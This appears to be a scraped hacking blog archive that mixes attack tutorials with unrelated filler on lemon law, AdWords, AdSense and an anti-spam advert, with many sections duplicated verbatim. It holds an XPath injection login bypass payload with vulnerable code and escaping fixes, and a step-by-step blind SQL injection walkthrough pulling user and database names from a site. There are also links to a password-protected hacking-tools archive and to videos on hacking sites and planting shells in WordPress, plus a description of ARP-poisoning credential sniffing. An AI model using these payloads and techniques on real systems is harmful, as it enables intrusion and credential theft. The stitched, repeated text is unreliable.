Download them all at
http://rapidshare.com/files/287748108/reiluke_tools.zip
password: www.reiluke.i.ph
26 Temmuz 2010 Pazartesi
24 Temmuz 2010 Cumartesi
XPATH Injection
Description
Similar to SQL Injection, XPath Injection attacks occur when a web site uses user-supplied information to construct an XPath query for XML data. By sending intentionally malformed information into the web site, an attacker can find out how the XML data is structured, or access data that he may not normally have access to. He may even be able to elevate his privileges on the web site if the XML data is being used for authentication (such as an XML based user file).
Querying XML is done with XPath, a type of simple descriptive statement that allows the XML query to locate a piece of information. Like SQL, you can specify certain attributes to find, and patterns to match. When using XML for a web site it is common to accept some form of input on the query string to identify the content to locate and display on the page. This input must be sanitized to verify that it doesn't mess up the XPath query and return the wrong data.
XPath is a standard language; its notation/syntax is always implementation independent, which means the attack may be automated. There are no different dialects as it takes place in requests to the SQL databeses.
Because there is no level access control it's possible to get the entire document. We won't encounter any limitations as we may know from SQL injection attacks.
Examples
We'll use this xml snippet for the examples.
Arnold
Baker
ABaker
SoSecret
Admin
Peter
Pan
PPan
NotTelling
User
Suppose we have a user authentication system on a web page that used a data file of this sort to login users. Once a username and password have been supplied the software might use XPath to look up the user:
VB:
Dim FindUserXPath as String
FindUserXPath = "//Employee[UserName/text()='" & Request("Username") & "' And
Password/text()='" & Request("Password") & "']"
C#:
String FindUserXPath;
FindUserXPath = "//Employee[UserName/text()='" + Request("Username") + "' And
Password/text()='" + Request("Password") + "']";
With a normal username and password this XPath would work, but an attacker may send a bad username and password and get an XML node selected without knowing the username or password, like this:
Username: blah' or 1=1 or 'a'='a
Password: blah
FindUserXPath becomes //Employee[UserName/text()='blah' or 1=1 or
'a'='a' And Password/text()='blah']
Logically this is equivalent to:
//Employee[(UserName/text()='blah' or 1=1) or
('a'='a' And Password/text()='blah')]
In this case, only the first part of the XPath needs to be true. The password part becomes irrelevant, and the UserName part will match ALL employees because of the "1=1" part.
Just like SQL injection, in order to protect yourself you must escape single quotes (or double quotes) if your application uses them.
VB:
Dim FindUserXPath as String
FindUserXPath = "//Employee[UserName/text()='" & Request("Username").Replace("'", "'") & "' And
Password/text()='" & Request("Password").Replace("'", "'") & "']"
C#:
String FindUserXPath;
FindUserXPath = "//Employee[UserName/text()='" + Request("Username").Replace("'", "'") + "' And
Password/text()='" + Request("Password").Replace("'", "'") + "']";
Another better mitigation option is to use a precompiled XPath[1]. Precompiled XPaths are already preset before the program executes, rather than created on the fly after the user's input has been added to the string. This is a better route because you don't have to worry about missing a character that should have been escaped.
Similar to SQL Injection, XPath Injection attacks occur when a web site uses user-supplied information to construct an XPath query for XML data. By sending intentionally malformed information into the web site, an attacker can find out how the XML data is structured, or access data that he may not normally have access to. He may even be able to elevate his privileges on the web site if the XML data is being used for authentication (such as an XML based user file).
Querying XML is done with XPath, a type of simple descriptive statement that allows the XML query to locate a piece of information. Like SQL, you can specify certain attributes to find, and patterns to match. When using XML for a web site it is common to accept some form of input on the query string to identify the content to locate and display on the page. This input must be sanitized to verify that it doesn't mess up the XPath query and return the wrong data.
XPath is a standard language; its notation/syntax is always implementation independent, which means the attack may be automated. There are no different dialects as it takes place in requests to the SQL databeses.
Because there is no level access control it's possible to get the entire document. We won't encounter any limitations as we may know from SQL injection attacks.
Examples
We'll use this xml snippet for the examples.
Suppose we have a user authentication system on a web page that used a data file of this sort to login users. Once a username and password have been supplied the software might use XPath to look up the user:
VB:
Dim FindUserXPath as String
FindUserXPath = "//Employee[UserName/text()='" & Request("Username") & "' And
Password/text()='" & Request("Password") & "']"
C#:
String FindUserXPath;
FindUserXPath = "//Employee[UserName/text()='" + Request("Username") + "' And
Password/text()='" + Request("Password") + "']";
With a normal username and password this XPath would work, but an attacker may send a bad username and password and get an XML node selected without knowing the username or password, like this:
Username: blah' or 1=1 or 'a'='a
Password: blah
FindUserXPath becomes //Employee[UserName/text()='blah' or 1=1 or
'a'='a' And Password/text()='blah']
Logically this is equivalent to:
//Employee[(UserName/text()='blah' or 1=1) or
('a'='a' And Password/text()='blah')]
In this case, only the first part of the XPath needs to be true. The password part becomes irrelevant, and the UserName part will match ALL employees because of the "1=1" part.
Just like SQL injection, in order to protect yourself you must escape single quotes (or double quotes) if your application uses them.
VB:
Dim FindUserXPath as String
FindUserXPath = "//Employee[UserName/text()='" & Request("Username").Replace("'", "'") & "' And
Password/text()='" & Request("Password").Replace("'", "'") & "']"
C#:
String FindUserXPath;
FindUserXPath = "//Employee[UserName/text()='" + Request("Username").Replace("'", "'") + "' And
Password/text()='" + Request("Password").Replace("'", "'") + "']";
Another better mitigation option is to use a precompiled XPath[1]. Precompiled XPaths are already preset before the program executes, rather than created on the fly after the user's input has been added to the string. This is a better route because you don't have to worry about missing a character that should have been escaped.
13 Temmuz 2010 Salı
lemon law
Lemon laws are American state laws that provide a remedy for purchasers of cars in order to compensate for cars that repeatedly fail to meet standards of quality and performance. These cars are called lemons. The federal lemon law (the Magnuson-Moss Warranty Act) protects citizens of all states. State lemon laws vary by state and may not necessarily cover used or leased cars. The rights afforded to consumers by lemon laws may exceed the warranties expressed in purchase contracts. Lemon law is the common nickname for these laws, but each state has different names for the laws and acts.
In California, lemon laws cover anything mechanical, as do the federal lemon laws. The federal lemon law also provides that the warranter may be obligated to pay the prevailing party's attorney fees in a successful lemon law suit, as do most state lemon laws.
In California, lemon laws cover anything mechanical, as do the federal lemon laws. The federal lemon law also provides that the warranter may be obligated to pay the prevailing party's attorney fees in a successful lemon law suit, as do most state lemon laws.
adwords
AdWords is Google's flagship advertising product and main source of revenue. Google's total advertising revenues were USD$21 billion in 2008[2]. AdWords offers pay-per-click (PPC) advertising, and site-targeted advertising for both text and banner ads. The AdWords program includes local, national, and international distribution. Google's text advertisements are short, consisting of one title line and two content text lines. Image ads can be one of several different Interactive Advertising Bureau (IAB) standard sizes.
Sales and Support for Google's AdWords division is based in Mountain View, California, with major secondary offices in Ann Arbor, Michigan[3], the company's third-largest US facility behind its Mountain View, California, headquarters and New York City office.[4] Engineering for AdWords is based in Mountain View, California.
Sales and Support for Google's AdWords division is based in Mountain View, California, with major secondary offices in Ann Arbor, Michigan[3], the company's third-largest US facility behind its Mountain View, California, headquarters and New York City office.[4] Engineering for AdWords is based in Mountain View, California.
Adsense
Google Adsense, her aşamadaki websitesi yayıncılarının site içeriğiyle ilgili Google reklamlarını websitelerinde göstererek para kazanmalarını sağlayan bir sistemdir. Google reklamları, ziyaretçilerin sitenizde aradıkları konulara ve ilgi alanlarına uygunluk sağlar, websitenizden para kazanmanızı da sağlar. Gösterim sayısının önemsiz olduğu bu sistemde önemli olan reklama tıklanma miktarıdır. Reklam verenler tıklama başında öder, sitenize te tıklama başına Google'den para ödenir. Bu reklam modeli CPC (cost per click) ya da Türkçesi Tıklama Bazında Maaliyet reklam modeli deniyor.
Reklam tıklama ücretleri ise çok adil yapılmaktadır. Örneğin siteniz "çöplük" denilen sitelerden ise tıklama başına 0,01 $ bile alamazken kaliteli bir sağlık sitesi ve az bulunan içeriği varsa tıklama başına 1 $, hatta dil olarak ingilizce ise de bu rakam 10$ a bile çıkmakta.
Google, hilelere karşı bir güvenlik sistemi geliştirmiştir. Eğer kişi kendi sitesindeki reklamlara tıklarsa, tıklamaya teşvik ederse, pop-up lar ile tıklatmayı arttırırsa ve bunun gibi reklamveren e zararı olan davranışlar sergilendiği durumlarda google hemen devreye girer ve reklam yayınlayan kullanıcı engellenir.
Buna ek olarak, Google AdSense'e kayıtlı olan web sitesi yayıncıları, ziyaretçilerine Google web ve site araması sunabilirler. Böylece yayıncılar, arama sonuçları sayfalarında gösterilen Google reklamları üzerinden para kazanırlar.
Google Adsense, sitenizin sahip olabileceği binlerce sayfaya ve içeriğinizin ne kadar dar veya geniş kaplamlı olduğuna bakmaksızın, içeriği anlamak ve uygun reklamları yerleştirmeye çalışır. İçerik değiştikçe Google reklamları da değişir. Ve reklamlarımız ülkeye göre de hedeflendiğinden, küresel şirketler ek bir çaba sarf etmeden yerel reklamlar yayınlayabilir.
Reklam tıklama ücretleri ise çok adil yapılmaktadır. Örneğin siteniz "çöplük" denilen sitelerden ise tıklama başına 0,01 $ bile alamazken kaliteli bir sağlık sitesi ve az bulunan içeriği varsa tıklama başına 1 $, hatta dil olarak ingilizce ise de bu rakam 10$ a bile çıkmakta.
Google, hilelere karşı bir güvenlik sistemi geliştirmiştir. Eğer kişi kendi sitesindeki reklamlara tıklarsa, tıklamaya teşvik ederse, pop-up lar ile tıklatmayı arttırırsa ve bunun gibi reklamveren e zararı olan davranışlar sergilendiği durumlarda google hemen devreye girer ve reklam yayınlayan kullanıcı engellenir.
Buna ek olarak, Google AdSense'e kayıtlı olan web sitesi yayıncıları, ziyaretçilerine Google web ve site araması sunabilirler. Böylece yayıncılar, arama sonuçları sayfalarında gösterilen Google reklamları üzerinden para kazanırlar.
Google Adsense, sitenizin sahip olabileceği binlerce sayfaya ve içeriğinizin ne kadar dar veya geniş kaplamlı olduğuna bakmaksızın, içeriği anlamak ve uygun reklamları yerleştirmeye çalışır. İçerik değiştikçe Google reklamları da değişir. Ve reklamlarımız ülkeye göre de hedeflendiğinden, küresel şirketler ek bir çaba sarf etmeden yerel reklamlar yayınlayabilir.
anti spam lotus notes
top receiving annoying spam. Messages offering credit cards, pornography, viagra, low mortgage rates, along with thousands more that you hate to receive.
Subscription Based. We list the known "spam" and, by using our software and the associated spam identification service (SpamNet), you take advantage of that list to automatically delete known spam as soon as it hits your Inbox!
Don't Bother typing in every name of every spammer's domain, or writing them nasty letters. Our service tracks literally millions of spam messages. If it finds one that matches a message that you have received, it puts it into a "Spam" folder.
"How do i like it???? Oh my god it's a god send! My mailbox has been in use since '97 long before the days of the really nasty spammers and well before anyone knew it was best to keep your email address to yourself.
As a result my email has been around the block and then some, seems like spammer has it. I left for my honeymoon two weeks ago, in one weeks time I had nearly a 1000 emails 95% of which were spam of course. I get so tired of weeding through them to find my real mail.
Your product is working flawlessly the idea is brilliant and I just can't say enough about it. You've totally changed my mornings!!! Now i just run SpanSentinel and get to reading my actual emails instead of taking 5 to 10 mins every morning to sift through the spam, spelled C-R-A-P.
So I will be recommending this install to everyone at my company and we may even just get the server version. Keep up the outstanding work!!!
Subscription Based. We list the known "spam" and, by using our software and the associated spam identification service (SpamNet), you take advantage of that list to automatically delete known spam as soon as it hits your Inbox!
Don't Bother typing in every name of every spammer's domain, or writing them nasty letters. Our service tracks literally millions of spam messages. If it finds one that matches a message that you have received, it puts it into a "Spam" folder.
"How do i like it???? Oh my god it's a god send! My mailbox has been in use since '97 long before the days of the really nasty spammers and well before anyone knew it was best to keep your email address to yourself.
As a result my email has been around the block and then some, seems like spammer has it. I left for my honeymoon two weeks ago, in one weeks time I had nearly a 1000 emails 95% of which were spam of course. I get so tired of weeding through them to find my real mail.
Your product is working flawlessly the idea is brilliant and I just can't say enough about it. You've totally changed my mornings!!! Now i just run SpanSentinel and get to reading my actual emails instead of taking 5 to 10 mins every morning to sift through the spam, spelled C-R-A-P.
So I will be recommending this install to everyone at my company and we may even just get the server version. Keep up the outstanding work!!!
8 Temmuz 2010 Perşembe
Shellden SQL Baglanıp Siteleri Hackleme admin password sıfırlama
bu videoda shellden SQL ile db baglanmayı ve siteleri hacklemeyi admin password sıfırlamayı wordpress sitelere admin panelden shell sokmayı gösterdim iyi seyirler.
http://www.dosyaload.net/index.php/files/get/-Fkk5XjRws/wordpess.rar
http://rapidshare.com/files/322350333/wordpess.rar.html
Gönderen ege zaman: 18:05 1 yorum Bu kayda verilen bağlantılar
http://www.dosyaload.net/index.php/files/get/-Fkk5XjRws/wordpess.rar
http://rapidshare.com/files/322350333/wordpess.rar.html
Gönderen ege zaman: 18:05 1 yorum Bu kayda verilen bağlantılar
Cain & Abel (Hacking - Çok Geniş Anlatım) !
Cain Abel ne yapar? “Man in the Middle” olarak adlandırılan “ortadaki adam” saldırısını, ARP zehirlemesi kullanarak gerçekleştirir böylece ağ’daki kullanıcıların özel bilgilerini görmektedir. Bunu yaparken desteklediği protokoller oldukça fazladır böylelikle örneğin bir banka/alışveriş sitesinde kredi kartını kullanan bir kullanıcının site/sayfa SSL’li dahi olsa bilgilerini görmek mümkündür. Program kablosuz ağ’lara bağlanarak gene bu tip işlemlerin yapılmasını desteklemektedir.
Yazının anlaşılabilmesi için belki bildiğiniz belkide bilmediğiniz bazı protokolleri ve terimleri açıklamak gerekli. Lütfen ne kadar “biliyorumda” desenizde “SÖZLÜK” bölümünü gözden geçirmeyi ihmal etmeyin.
Sözlük
ARP Adres Çözümleme Protokolü - Vikipedi Address Request Protocol, lokal ağ’larda paketlerin gönderilmesini/alınmasını sağlayan ikinci katmanda (L2) çalışan protokol. OSI OSI Modeli - Vikipedi katmanlama modeline göre temel amacı, L3’den gelen adresleme paketlerine L2 adresleme paketlerini eklemektir. DOD TCP/IP model - Wikipedia, the free encyclopedia katmanlama modeline göre temel amacı, L2’den gelen adresleme paketlerine L1 adresleme paketlerini eklemektir.
IP IP adresi - Vikipedi Internet Protocol, internet ağ’ına bağlı her cihazın kendine ait en az bir adet IP adresi vardır bu adres başka hiçbir cihazda yoktur. Böylelikle “adresleme” sağlanmaktadır. IP protokol’ünü geliştiren ekip DOD modelini geliştirmiştir ve daha sonra geliştirilen OSI modelini “benimsememiştir”. Bu bakımdan bilişime yeni başlayan birinin L2’si eskilerin L1’ine denk gelmektedir, bu da bazen karışıklıklara sebep olmaktadır.
IPv4 IP adresi - Vikipedi 32bit uzunluğuna sahiptir, güvenlik özelliği yoktur. Bu bakımdan güvenli haberleşmeyle ilgili protokoller daha üst katmanlarda çalışır.
IPv6 IPv6 - Vikipedi 128bit uzunluğundadır, güvenlik özelliği vardır. Yaklaşık 10 yıldır geliştirilmektedir ve yaygınlaşması için belirlenen plana göre 2007 yılında tüm dünyanın geçmesi beklenmektedir.
Ethernet; Dünyada en yayğın olarak kullanılan arabirimin adıdır. 1973 yılında Xerox firması tarafından geliştirilmiş ve standartları DEC, Intel ve Xerox tarafından belirlenmiştir. Yaygın kullanıma 3Com firması sunmuştur.
Wirespeed Wire speed - Wikipedia, the free encyclopedia Switch’e gelen paketin işlenmesi gecikmelere sebep olur (switch marka modeline göre; 10Mbit 40-70ms, 100Mbit 11-30ms, 1Gbit 4-8ms). Wirespeed özelliğine sahip switch’te böyle bir gecikme yaşanmaz. Böylece örneğin 1Gbit hızındaki porttan saniyede enaz 84byte’lık 1.448.000 adet, 1500byte’lık 83.333 paket (10Mbit’te 84byte’lık 14.880 adet, 100Mbit’te 84byte’lık 148.800 adet” veya “10Mbit’te 1500byte’lık 833 paket, 100Mbit’te 1500byte’lık 8.333 paket) gecikmeksizin işlenerek geçer.
Switch Ağ anahtarı - Vikipedi Anahtarlayıcı, portlarına takılı cihazların, host’ların, sunucuların ve istemcilerin macid’lerini ve hangi port’larda olduklarını kendi üstündeki bir tabloda tutarak ve sürekli güncelleyerek, “a” port’undan gelen paketin hedef macid’sini tablodan bulup, uyan port “b”ye gönderir.
PoE Power over Ethernet - Wikipedia, the free encyclopedia Power over Ethernet, ethernet portuna bağlanan PoE desteği bulunan cihaza (örneğin ip kamera) elektrik (1.8-60 volt) verilmesini sağlar. Böylece cihazın ayrıca bir elektrik kablosu kullanması gerekmez. Kullanılan CATx kablonun kaliteli olmasına özellikle dikkat edilmelidir.
L1 Fiziksel katman - Vikipedi OSI; Birinci katman fiziksel katman, paketin hangi tür arabirim ile aktarılacağını ve iletimini sağlar. Üst katmanlardan gelen paketler binary olarak kodlanmışken bu katmanda, arabirimin tipine göre elektrik veya ışık sinyallerine çevirilir.
L2 Veri bağlantısı katmanı - Vikipedi OSI; İkinci katman veri bağlantısı katmanı, genellikle arabirimin içindedir bazı durumlarda işletim sistemi sürücüsü olarakta adlandırılır. Diğer cihazları/sunucu/istemcileri bulma, verinin gönderilme zamanının denetimi, iletimi ve hata kontrolümü yapar.
L3 Bilgisayar ağı - Vikipedi OSI; Üçüncü katman ağ katmanı, örneğin IP ve icmp bu katmanda çalışır, paketin ağ dışında bir başka ağ’a gönderilip gönderilmeyeceğine ve gönderilmesi durumunda paketteki adres değişimlerinden sorumludur.
L4 http://tr.wikipedia.org/wiki/Transport OSI; Dördüncü katman taşıma katmanı, veri paketlerinin arabirimin tipine göre ne kadarlık olacağına karar verip ayrımlarda bulunur. Port işlemleri bu katmanda yer alır, TCP ve UDP gibi protokollerin çalıştığı katmandır.
N-B Asynchronous I/O - Wikipedia, the free encyclopedia Non-Blocking, switch’in, tüm portlarının hızlarının toplamından daha yüksek kapasiteli işleme gücü varsa, paket kaybı olmaksızın tüm portları tam kapasite çalıştırabileceğiniz anlamına gelir.
Gbit Gigabit - Wikipedia, the free encyclopedia 1000Mbit’lik hız değerini temsil eder. Bu tür bir ortamda kaliteli switch, kablo ve kablolama kalitesi iyi durumdaysa saniyede enaz “84byte’lık 1.488.000 adet veya 1500byte’lık 83.333 adet paket geçebilir.
UpLink Switch ortamlarda istemci ve sunucu hariç diğer bağlantıların yapıldığı port’lara verilen isimlendirmedir.
DHCP DHCP - Vikipedi Dynamic Host Configuration Protocol, ağ’daki host’lara istemci’lere otomatik olarak IP ve diğer servislerle ilgili IP adreslerini veren servistir.
MacID MAC adresi - Vikipedi Media Access Control, 48bit uzunluğunda dır ve ilk 24bit üretici numaralarına ayrılmıştır, kanal 24bit her üreticinin kendi vereceği sıra numaraları gibi düşünülebilir. Dünyada üretilen arabirimlerin (örneğin ethernet kartınız) hiçbirinin macid’si diğeri ile aynı değildir, böylece ARP adreslemesi sorunsuz olarak çalışır.
Peki yönetici ile Cain&Abel kullanan arasında ne fark vardır?
Temeldeki teknik fark şudur, birinci yöntemde ağda fazladan paket oluşumunu engelleyip yükü switch üstünde tutarak dinleme yapılmaktadır ve sorunu çözmeye yönelik kullanılır. ARP zehirleme saldırısında ise art niyetli kişi söz konusudur ve ağda fazladan paket oluşmasına sebep olarak ağdaki tüm switch’lere yük bindirir.
Dummy kullanıcı nedir?
Böyle birşeyin varlığından haberi bile yokken “hacker (lamer)” arkadaşı veya bir “hacker (lamer)”la yaptığı konuşmada ARP Poisoning lafını merak eder, google açıp “arp poison” yazar ikinci linke www.oxid.it tıklar...
Yazının anlaşılabilmesi için belki bildiğiniz belkide bilmediğiniz bazı protokolleri ve terimleri açıklamak gerekli. Lütfen ne kadar “biliyorumda” desenizde “SÖZLÜK” bölümünü gözden geçirmeyi ihmal etmeyin.
Sözlük
ARP Adres Çözümleme Protokolü - Vikipedi Address Request Protocol, lokal ağ’larda paketlerin gönderilmesini/alınmasını sağlayan ikinci katmanda (L2) çalışan protokol. OSI OSI Modeli - Vikipedi katmanlama modeline göre temel amacı, L3’den gelen adresleme paketlerine L2 adresleme paketlerini eklemektir. DOD TCP/IP model - Wikipedia, the free encyclopedia katmanlama modeline göre temel amacı, L2’den gelen adresleme paketlerine L1 adresleme paketlerini eklemektir.
IP IP adresi - Vikipedi Internet Protocol, internet ağ’ına bağlı her cihazın kendine ait en az bir adet IP adresi vardır bu adres başka hiçbir cihazda yoktur. Böylelikle “adresleme” sağlanmaktadır. IP protokol’ünü geliştiren ekip DOD modelini geliştirmiştir ve daha sonra geliştirilen OSI modelini “benimsememiştir”. Bu bakımdan bilişime yeni başlayan birinin L2’si eskilerin L1’ine denk gelmektedir, bu da bazen karışıklıklara sebep olmaktadır.
IPv4 IP adresi - Vikipedi 32bit uzunluğuna sahiptir, güvenlik özelliği yoktur. Bu bakımdan güvenli haberleşmeyle ilgili protokoller daha üst katmanlarda çalışır.
IPv6 IPv6 - Vikipedi 128bit uzunluğundadır, güvenlik özelliği vardır. Yaklaşık 10 yıldır geliştirilmektedir ve yaygınlaşması için belirlenen plana göre 2007 yılında tüm dünyanın geçmesi beklenmektedir.
Ethernet; Dünyada en yayğın olarak kullanılan arabirimin adıdır. 1973 yılında Xerox firması tarafından geliştirilmiş ve standartları DEC, Intel ve Xerox tarafından belirlenmiştir. Yaygın kullanıma 3Com firması sunmuştur.
Wirespeed Wire speed - Wikipedia, the free encyclopedia Switch’e gelen paketin işlenmesi gecikmelere sebep olur (switch marka modeline göre; 10Mbit 40-70ms, 100Mbit 11-30ms, 1Gbit 4-8ms). Wirespeed özelliğine sahip switch’te böyle bir gecikme yaşanmaz. Böylece örneğin 1Gbit hızındaki porttan saniyede enaz 84byte’lık 1.448.000 adet, 1500byte’lık 83.333 paket (10Mbit’te 84byte’lık 14.880 adet, 100Mbit’te 84byte’lık 148.800 adet” veya “10Mbit’te 1500byte’lık 833 paket, 100Mbit’te 1500byte’lık 8.333 paket) gecikmeksizin işlenerek geçer.
Switch Ağ anahtarı - Vikipedi Anahtarlayıcı, portlarına takılı cihazların, host’ların, sunucuların ve istemcilerin macid’lerini ve hangi port’larda olduklarını kendi üstündeki bir tabloda tutarak ve sürekli güncelleyerek, “a” port’undan gelen paketin hedef macid’sini tablodan bulup, uyan port “b”ye gönderir.
PoE Power over Ethernet - Wikipedia, the free encyclopedia Power over Ethernet, ethernet portuna bağlanan PoE desteği bulunan cihaza (örneğin ip kamera) elektrik (1.8-60 volt) verilmesini sağlar. Böylece cihazın ayrıca bir elektrik kablosu kullanması gerekmez. Kullanılan CATx kablonun kaliteli olmasına özellikle dikkat edilmelidir.
L1 Fiziksel katman - Vikipedi OSI; Birinci katman fiziksel katman, paketin hangi tür arabirim ile aktarılacağını ve iletimini sağlar. Üst katmanlardan gelen paketler binary olarak kodlanmışken bu katmanda, arabirimin tipine göre elektrik veya ışık sinyallerine çevirilir.
L2 Veri bağlantısı katmanı - Vikipedi OSI; İkinci katman veri bağlantısı katmanı, genellikle arabirimin içindedir bazı durumlarda işletim sistemi sürücüsü olarakta adlandırılır. Diğer cihazları/sunucu/istemcileri bulma, verinin gönderilme zamanının denetimi, iletimi ve hata kontrolümü yapar.
L3 Bilgisayar ağı - Vikipedi OSI; Üçüncü katman ağ katmanı, örneğin IP ve icmp bu katmanda çalışır, paketin ağ dışında bir başka ağ’a gönderilip gönderilmeyeceğine ve gönderilmesi durumunda paketteki adres değişimlerinden sorumludur.
L4 http://tr.wikipedia.org/wiki/Transport OSI; Dördüncü katman taşıma katmanı, veri paketlerinin arabirimin tipine göre ne kadarlık olacağına karar verip ayrımlarda bulunur. Port işlemleri bu katmanda yer alır, TCP ve UDP gibi protokollerin çalıştığı katmandır.
N-B Asynchronous I/O - Wikipedia, the free encyclopedia Non-Blocking, switch’in, tüm portlarının hızlarının toplamından daha yüksek kapasiteli işleme gücü varsa, paket kaybı olmaksızın tüm portları tam kapasite çalıştırabileceğiniz anlamına gelir.
Gbit Gigabit - Wikipedia, the free encyclopedia 1000Mbit’lik hız değerini temsil eder. Bu tür bir ortamda kaliteli switch, kablo ve kablolama kalitesi iyi durumdaysa saniyede enaz “84byte’lık 1.488.000 adet veya 1500byte’lık 83.333 adet paket geçebilir.
UpLink Switch ortamlarda istemci ve sunucu hariç diğer bağlantıların yapıldığı port’lara verilen isimlendirmedir.
DHCP DHCP - Vikipedi Dynamic Host Configuration Protocol, ağ’daki host’lara istemci’lere otomatik olarak IP ve diğer servislerle ilgili IP adreslerini veren servistir.
MacID MAC adresi - Vikipedi Media Access Control, 48bit uzunluğunda dır ve ilk 24bit üretici numaralarına ayrılmıştır, kanal 24bit her üreticinin kendi vereceği sıra numaraları gibi düşünülebilir. Dünyada üretilen arabirimlerin (örneğin ethernet kartınız) hiçbirinin macid’si diğeri ile aynı değildir, böylece ARP adreslemesi sorunsuz olarak çalışır.
Peki yönetici ile Cain&Abel kullanan arasında ne fark vardır?
Temeldeki teknik fark şudur, birinci yöntemde ağda fazladan paket oluşumunu engelleyip yükü switch üstünde tutarak dinleme yapılmaktadır ve sorunu çözmeye yönelik kullanılır. ARP zehirleme saldırısında ise art niyetli kişi söz konusudur ve ağda fazladan paket oluşmasına sebep olarak ağdaki tüm switch’lere yük bindirir.
Dummy kullanıcı nedir?
Böyle birşeyin varlığından haberi bile yokken “hacker (lamer)” arkadaşı veya bir “hacker (lamer)”la yaptığı konuşmada ARP Poisoning lafını merak eder, google açıp “arp poison” yazar ikinci linke www.oxid.it tıklar...
blind-sql-injection-dummy
Aku akan mencoba menjelaskan sesimple mungkin tentang blind sql injection yang aku anggap dulu rumit banget... Bukannya sok ngajarin atau apalah, disini aku hanya berusaha memberikan apa yang aku punya dan bisa...
Oke, semua bermula karena aku suntuk banget...Semua target .go.id, co.id atau apapun.id dah dibabat habis sama senior disini...Akhirnya tanpa sengaja aku nyangkut ke situs luar...Anggep aja situs tersebut bernama
http://iseng.com/news.php?id=76009
Nah pada target aku kali ini, aku menggunakan sql commands mid() yang hampir sama fungsinya dengan substring()...
Langsung aja aku ketik
http://iseng.com/news.php?id=76009 and 1=0
dan ternyata hasilnya adalah FALSE
http://iseng.com/news.php?id=76009 and 1=1
bernilai TRUE
Nah setelah aku yakin kalo web tersebut vulnerable maka aku melakukan injeksi (hehehehe...)
http://iseng.com/news.php?id=76009 and mid(user(),1,1)=CHAR(65)
Nah penjelasannya supaya lo semua pada ngerti (hehehehe...orang aku juga baru belajar, sok ngasih tau...) aku akan coba menjelaskan arti dan makna dari baris URL dan statement diatas...
~ mid(user()1,1) artinya dalam kasus ini aku tidak mengetahui value atau nilai dari user itu apa, maka dalam "()" aku sengaja kosongkan.
~ 1,1 adalah urutan dari value tersebut.
~ CHAR adalah peubah dalam desimal
~ 65 adalah value decimal tersebut dan 65 adalah "A" dalam ASCII so aku akan mengawalinya dengan 65
Nah kalo dah begini apa yang akan terjadi? Dalam tampilan web tersebut akan terjadi true atau false...Nah dalam kasus ini false, berarti aku harus memasukkan nilai yang lain agar menjadi true...
FALSE
http://iseng.com/news.php?id=76009 and mid(user(),1,1)=CHAR(65)
FALSE
http://iseng.com/news.php?id=76009 and mid(user(),1,1)=CHAR(66)
TRUE!!!
http://iseng.com/news.php?id=76009 and mid(user(),1,1)=CHAR(67)
Akhirnya mendapatkan nilai true dan nilai tersebut adalah 67 (C dalam ASCII)
Cari nilai kedua dan caranya adalah...
http://iseng.com/news.php?id=76009 and mid(user(),1,2)=CHAR(67,65)
Nah 1,1 nya dah diganti dengan 1,2...Jadi kalo dah dapet diganti aja jadi 1,3...1,4 dan seterusnya...
Nah akhirnya aku mendapat nilai true pada angka ke 82 (R dalam ASCII)
Lanjutin aja sampe dapet nilai atau value user dan sampai akhirnya menjadi
http://iseng.com/news.php?id=76009 and mid(user(),1,6)=CHAR(67,82,85,90,51,78)
67=C
82=R
85=U
90=Z
51=3
78=N
Ternyata username-nya adalah CRUZ3N (Wow.... Kebetulan yang sangat lucu ;p)
Nah untuk cari passwordnya aku tinggal mengganti value user() menjadi database() dan lakukan semua tahap diatas dari pertama sampe dapet value true...
Contoh:
http://iseng.com/news.php?id=76009 and mid mid(database(),1,5)=CHAR(75,69,82,69,78)
Jadi password yang didapat adalah...
75=K
69=E
82=R
69=E
78=N
Jadi username dan passwordnya adalah CRUZ3N dan KEREN...
Ternyata Blind SQL Injection gak nyebel-nyebelin amat (Tapi ngebetein...). Nah katanya neh...cara ini cukup efektif untuk web yang telah menfilter SQL Injection...Bener gak tuh? Gak tau dah... Ilmu aku belom nyampe situ...
Oke sampe disini aja yah...
Mohon maaf jika ada salah-salah kata dan berhubung aku lupa jadi kagak ada screenshootnya (Padahal kalo ada keren banget tuh ;p).
Semoga penjelasan yang sangat amat singkat dan gak ada apa-apanya ini dapat berguna...
Nih kode ASCII yang sapa tau berguna...
Char Code Description
9 Tab
10 Line feed
13 Carriage return
' ' 32 Space
! 33 Exclamation mark
" 34 Quotation mark
# 35 Number sign
$ 36 Dollar sign
% 37 Percent sign
& 38 Ampersand
' 39 Apostrophe
( 40 Left parenthesis
) 41 Right parenthesis
* 42 Asterisk
+ 43 Plus sign
, 44 Comma
- 45 Hyphen-minus
. 46 Full stop
/ 47 Solidus
0 48 Digit zero
1 49 Digit one
2 50 Digit two
3 51 Digit three
4 52 Digit four
5 53 Digit five
6 54 Digit six
7 55 Digit seven
8 56 Digit eight
9 57 Digit nine
: 58 Colon
; 59 Semicolon
< 60 Less-than sign
= 61 Equals sign
> 62 Greater-than sign
? 63 Question mark
@ 64 Commercial at
A 65 Latin capital letter A
B 66 Latin capital letter B
C 67 Latin capital letter C
D 68 Latin capital letter D
E 69 Latin capital letter E
F 70 Latin capital letter F
G 71 Latin capital letter G
H 72 Latin capital letter H
I 73 Latin capital letter I
J 74 Latin capital letter J
K 75 Latin capital letter K
L 76 Latin capital letter L
M 77 Latin capital letter M
N 78 Latin capital letter N
O 79 Latin capital letter O
P 80 Latin capital letter P
Q 81 Latin capital letter Q
R 82 Latin capital letter R
S 83 Latin capital letter S
T 84 Latin capital letter T
U 85 Latin capital letter U
V 86 Latin capital letter V
W 87 Latin capital letter W
X 88 Latin capital letter X
Y 89 Latin capital letter Y
Z 90 Latin capital letter Z
[ 91 Left square bracket
92 Reverse solidus
] 93 Right square bracket
^ 94 Circumflex accent
_ 95 Low line
` 96 Grave accent
a 97 Latin small letter a
b 98 Latin small letter b
c 99 Latin small letter c
d 100 Latin small letter d
e 101 Latin small letter e
f 102 Latin small letter f
g 103 Latin small letter g
h 104 Latin small letter h
i 105 Latin small letter i
j 106 Latin small letter j
k 107 Latin small letter k
l 108 Latin small letter l
m 109 Latin small letter m
n 110 Latin small letter n
o 111 Latin small letter o
p 112 Latin small letter p
q 113 Latin small letter q
r 114 Latin small letter r
s 115 Latin small letter s
t 116 Latin small letter t
u 117 Latin small letter u
v 118 Latin small letter v
w 119 Latin small letter w
x 120 Latin small letter x
y 121 Latin small letter y
z 122 Latin small letter z
{ 123 left curly bracket
| 124 Vertical line
} 125 Right curly bracket
~ 126 Tilde
127 (not used)
? 128 Euro sign Currency Symbols
? 129 (not used)
